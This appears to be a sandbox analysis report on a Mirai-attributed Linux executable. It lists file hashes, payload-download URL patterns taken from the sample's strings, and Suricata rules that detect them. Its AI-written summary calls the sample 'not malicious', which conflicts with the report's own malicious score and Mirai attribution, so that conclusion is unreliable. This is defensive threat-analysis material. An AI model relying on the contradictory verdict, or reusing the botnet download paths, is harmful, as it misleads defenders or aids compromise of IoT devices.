The analysis of the sample indicates that it was successfully executed in the sandbox environment. However, no notable behavior was observed during the execution phase. The dynamic behavior summary shows a high frequency of `open` and `readlink` system calls, primarily targeting `/proc` entries, which suggests the sample may have been attempting to gather information about running processes. Despite this activity, there were no indications of malicious behavior such as network connections, file modifications, or attempts at persistence. The static analysis revealed that the sample is an executable file (ET_EXEC) that is stripped and not packed. It matched a YARA rule associated with malicious documents, but this alone does not confirm malicious intent. The absence of capabilities related to known attack techniques further supports the conclusion that the sample did not exhibit harmful behavior during the analysis. The IOCs provided include URLs that could potentially be associated with malicious activity, but without further context or evidence of their use during the execution, they do not contribute to a definitive conclusion regarding the sample's intent. In summary, while the sample executed without errors, the lack of observable malicious behavior leads to a verdict of "not malicious" based on the available evidence. The analysis does not support any claims of initial access, execution, persistence, defense evasion, command and control, or impact.

Evasion analysis

No evasive checkpoints detected.

2 malicious 0 suspicious 3 info
Attribution:Mirai

Network indicators

3
SeverityTypeIndicatorDescription
info url http://%s/mipsel; Extracted from the sample's strings
info url http://%s/mips; Extracted from the sample's strings
info url http://%s/telnet.sh; Extracted from the sample's strings

File indicators

2
SeverityTypeIndicatorDescription
malicious sample_sha256 7bc4b2aef74456cca1499e1c6e3ce28827aa3c2d6e4a1f18cad547ad47e0b8ff Submitted sample (SHA256)
malicious sample_md5 63d793118a9378ecb7367a3e838f332d Submitted sample (MD5)

Sigma detections

0 matches of 2275 rules

The Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.

Generated rules

Suricata/Snort: auto_file_2376_suricata

Auto-generated
alert http any any -> any any (msg:"sandbox auto scan 2376 C2 URL"; http.uri; content:"/mipsel\;"; sid:15976832; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2376 C2 URL"; http.uri; content:"/mips\;"; sid:15976833; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2376 C2 URL"; http.uri; content:"/telnet.sh\;"; sid:15976834; rev:1;)

Extracted files

What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.

No extracted files

Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.

Export & download

/s/2376

The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.

AI analysis report

An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).

Public analyses of this file

1 run
SubmittedEnvironmentVerdictScore
2026-09-07 21:42 Shown below Static analysis Malicious 80/100